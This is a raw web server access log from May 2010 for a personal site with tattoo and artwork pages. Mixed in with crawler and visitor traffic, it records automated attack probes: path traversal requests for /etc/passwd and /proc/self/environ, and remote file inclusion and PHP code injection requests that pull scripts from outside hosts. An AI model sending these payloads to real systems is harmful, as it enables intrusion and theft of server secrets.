99.39.2.249 - - [01/May/2010:22:40:44 -0500] "GET /logs/access_log.1219968000//microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 357 "-""libwww-perl/5.834"
99.39.2.249 - - [01/May/2010:22:40:44 -0500] "GET //microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.834"
99.39.2.249 - - [01/May/2010:22:40:44 -0500] "GET /logs//microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 335 "-""libwww-perl/5.834"
67.218.116.162 - - [01/May/2010:22:42:07 -0500] "GET /artwork/postcards.htm HTTP/1.1" 200 690 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [01/May/2010:22:43:32 -0500] "GET /logs/access_log.1256342400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [01/May/2010:22:43:53 -0500] "GET /logs/access_log.1271808000 HTTP/1.0" 200 676471 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.127.253.75 - - [01/May/2010:22:45:21 -0500] "GET /logs/access_log.1212451200/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.826"
210.127.253.75 - - [01/May/2010:22:45:21 -0500] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.826"
210.127.253.75 - - [01/May/2010:22:45:22 -0500] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.826"
88.191.94.188 - - [01/May/2010:22:47:33 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt??????????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:22:47:33 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt??????????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:22:47:33 -0500] "GET /logs/access_log.1265760000//index.php?DOCUMENT_ROOT=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt??????????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:22:47:39 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt??????????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:22:47:39 -0500] "GET /logs/access_log.1265760000//index.php?DOCUMENT_ROOT=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt??????????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:22:47:42 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt??????????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.88.4.141 - - [01/May/2010:22:50:08 -0500] "GET /logs/access_log.1212451200//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
121.88.4.141 - - [01/May/2010:22:50:09 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.88.4.141 - - [01/May/2010:22:50:09 -0500] "GET /logs//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
216.129.119.44 - - [01/May/2010:22:52:08 -0500] "GET /logs/access_log.1218240000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
121.88.4.141 - - [01/May/2010:22:55:01 -0500] "GET /logs/access_log.1212451200//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
121.88.4.141 - - [01/May/2010:22:55:01 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.88.4.141 - - [01/May/2010:22:55:02 -0500] "GET /logs//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
121.88.4.141 - - [01/May/2010:22:56:16 -0500] "GET /logs/access_log.1212451200//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
121.88.4.141 - - [01/May/2010:22:56:17 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.88.4.141 - - [01/May/2010:22:56:17 -0500] "GET /logs//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.250.255.243 - - [01/May/2010:22:56:36 -0500] "GET /logs/access_log.1272326400 HTTP/1.1" 200 499731 "-""Yandex/1.01.001 (compatible; Win16; I)"
65.163.88.107 - - [01/May/2010:23:02:16 -0500] "GET //index.php?option=com_letterman&contoler/view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
65.163.88.107 - - [01/May/2010:23:02:17 -0500] "GET /./index.php?option=com_letterman&contoler/view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
121.254.228.21 - - [01/May/2010:23:02:33 -0500] "GET /logs/access_log.1265760000///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:23:02:33 -0500] "GET /logs///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3999 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:23:02:33 -0500] "GET ///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
208.115.111.248 - - [01/May/2010:23:03:05 -0500] "GET /logs/access_log.1217289600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:23:03:07 -0500] "GET /logs/access_log.1230595200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
121.254.228.21 - - [01/May/2010:23:03:08 -0500] "GET /logs/access_log.1264982400///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.115.111.248 - - [01/May/2010:23:03:10 -0500] "GET /logs/access_log.1231372800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:23:03:12 -0500] "GET /logs/access_log.1240012800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:23:03:14 -0500] "GET /logs/access_log.1243123200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:23:03:17 -0500] "GET /logs/access_log.1252540800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:23:03:19 -0500] "GET /logs/access_log.1253923200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
114.24.79.210 - - [01/May/2010:23:07:17 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
114.24.79.210 - - [01/May/2010:23:07:23 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
87.250.255.243 - - [01/May/2010:23:09:37 -0500] "GET /logs/access_log.1253491200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
70.38.117.233 - - [01/May/2010:23:15:15 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:23:15:15 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:23:15:31 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:23:15:31 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:23:15:31 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:23:15:32 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:23:15:32 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:23:15:33 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:23:15:33 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:23:15:33 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:23:15:45 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:23:15:48 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.163.88.107 - - [01/May/2010:23:19:36 -0500] "GET /logs/access_log.1270684800/./index.php?option=com_letterman&contoler/view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
65.163.88.107 - - [01/May/2010:23:19:36 -0500] "GET /./index.php?option=com_letterman&contoler/view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
65.163.88.107 - - [01/May/2010:23:19:36 -0500] "GET /logs/./index.php?option=com_letterman&contoler/view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
65.163.88.107 - - [01/May/2010:23:19:41 -0500] "GET /logs/access_log.1270684800//index.php?option=com_letterman&contoler/view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
65.163.88.107 - - [01/May/2010:23:19:41 -0500] "GET //index.php?option=com_letterman&contoler/view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
65.163.88.107 - - [01/May/2010:23:19:42 -0500] "GET /logs//index.php?option=com_letterman&contoler/view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
207.46.199.200 - - [01/May/2010:23:19:59 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [01/May/2010:23:20:22 -0500] "GET /?D=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/May/2010:23:22:10 -0500] "GET /?N=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.163.88.107 - - [01/May/2010:23:22:11 -0500] "GET /logs/access_log.1270598400//index.php?option=com_letterman&contoler/view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
65.163.88.107 - - [01/May/2010:23:22:16 -0500] "GET /logs/access_log.1270598400/./index.php?option=com_letterman&contoler/view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
64.22.100.83 - - [01/May/2010:23:22:48 -0500] "GET /logs/access_log.1257120000//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
64.22.100.83 - - [01/May/2010:23:22:48 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.22.100.83 - - [01/May/2010:23:22:48 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:23:24:18 -0500] "GET /logs/access_log.1234483200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
173.16.115.207 - - [01/May/2010:23:26:03 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:03 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:15 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:15 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:16 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:17 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)"
173.16.115.207 - - [01/May/2010:23:26:19 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:19 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:19 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:19 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:19 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:19 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:19 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:20 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:20 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:20 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:20 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
64.22.100.83 - - [01/May/2010:23:26:24 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
64.22.100.83 - - [01/May/2010:23:26:24 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.22.100.83 - - [01/May/2010:23:26:24 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
173.16.115.207 - - [01/May/2010:23:26:40 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:40 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:40 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:40 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:40 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:40 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:41 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:41 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:41 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:41 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:26:41 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
64.22.100.83 - - [01/May/2010:23:26:52 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
173.16.115.207 - - [01/May/2010:23:28:22 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:28:22 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:28:22 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:28:22 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:28:22 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:28:22 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
